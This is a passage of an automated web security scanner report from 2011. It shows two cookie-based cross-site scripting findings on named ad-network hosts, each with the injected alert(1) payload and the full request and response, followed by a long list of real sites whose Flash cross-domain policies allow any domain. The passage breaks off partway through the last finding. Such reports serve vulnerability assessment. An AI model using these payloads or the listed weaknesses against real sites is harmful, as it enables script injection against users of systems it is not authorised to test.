The value of the na_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326a9"><script>alert(1)</script>fa144a76584 was submitted in the na_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /e/a-677/s-2140.xgi?na_random=678669980&na_url=http%3A//www.fingerhut.com/&na_referrer=&na_title=Fingerhut%3A%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=Apply%20for%20Credit%2C%20Low%20Monthly%20Payments%2C%20Apparel%2C%20Electronics%2C%20Bed%2C%20Bath%2C%20Toys%2C%20Video%20Games%2C%20MP3%20Players%2C%20Home%20Furnishings HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=326a9"><script>alert(1)</script>fa144a76584; na_lr=20110515; na_ps=1; na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=326a9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efa144a76584; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:39:13 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:39:13 GMT
Server: lighttpd/1.4.18
Content-Length: 541


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d326a9"><script>alert(1)</script>fa144a76584&phint=__bk_t%3dFingerhut: Apply For Credit Get Low Monthly Payments&phint=__bk_k%3dApply for Credit, Low Monthly Payments, Apparel, Electronics, Bed, Bath, Toys, Video Games, MP3 Players, Home Furnish
...[SNIP]...

5.126. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9420e"-alert(1)-"ad6a30360a0 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x303190.js&size_id=2&account_id=4462&site_id=5032&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=9420e"-alert(1)-"ad6a30360a0; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=5032^1; csi2=3158416.js^1^1305508790^1305508790; rpb=5671%3D1; put_2081=AG-00000001389358554

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:22:18 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110261; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3179363.js^2^1305508799^1305508938&3158416.js^1^1305508790^1305508790; expires=Mon, 23-May-2011 01:22:18 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1283

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3179363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9420e"-alert(1)-"ad6a30360a0\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 86 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 16 May 2011 01:24:43 GMT
Expires: Mon, 16 May 2011 01:29:43 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.2. http://6e8d64.r.axf8.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://6e8d64.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 6e8d64.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:32:50 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.3. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.4. http://ad-emea.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 16 May 2011 01:19:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.5. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 15 May 2011 21:21:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:19:49 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.7. http://admeld.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.8. http://ahome.disney.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ahome.disney.go.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=10
Date: Mon, 16 May 2011 01:29:22 GMT
Content-Type: text/xml; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:29:15 GMT
Accept-Ranges: bytes
ETag: W/"8027cdaa6813cc1:10eb"
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=60D33DE2-6672-4C5F-A0C8-19715A096F8C; path=/; expires=Mon, 16-May-2031 01:29:22 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 01:29:25 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 453
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="dolimg.com" />
<allow-access-from domain="a.dolimg.com" />
<allow-access-from domain="home.disney.go.com" />
<allow-access-from domain="disney.go.com" />
<allow-access-from domain="hb.disney.go.com" />
...[SNIP]...

6.9. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 85448

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.10. http://aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:fe8"
Server: Microsoft-IIS/6.0
X-Server: D2G.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Mon, 16 May 2011 01:22:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:22:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

6.11. http://api.ak.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ak.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
X-FB-Server: 10.36.9.114
X-Cnection: close
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 01:25:14 GMT
Date: Mon, 16 May 2011 01:25:14 GMT
Content-Length: 280
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.12. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 21:31:00 GMT
Date: Sun, 15 May 2011 21:31:00 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.13. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 16 May 2011 01:19:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.14. http://c7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6050
Date: Mon, 16 May 2011 01:30:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.15. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sun, 15 May 2011 21:19:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 16 May 2011 01:19:51 GMT
Date: Mon, 16 May 2011 01:19:51 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.17. http://cdn5.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 710
Content-Type: text/xml
Date: Sun, 15 May 2011 21:31:35 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.18. http://ctix8.cheaptickets.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ctix8.cheaptickets.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:80c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:22:46 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://d.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:19:58 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.20. http://dar.youknowbest.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dar.youknowbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dar.youknowbest.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://dar.youknowbest.com/crossdomain.xml
Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT
Accept-Ranges: bytes
ETag: "01e78cfe96cb1:de1"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: CO-ADSWEB01
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:41:16 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.21. http://feeds.delicious.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:25:00 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.22. http://fingerhut.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fingerhut.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fingerhut.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:33:11 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
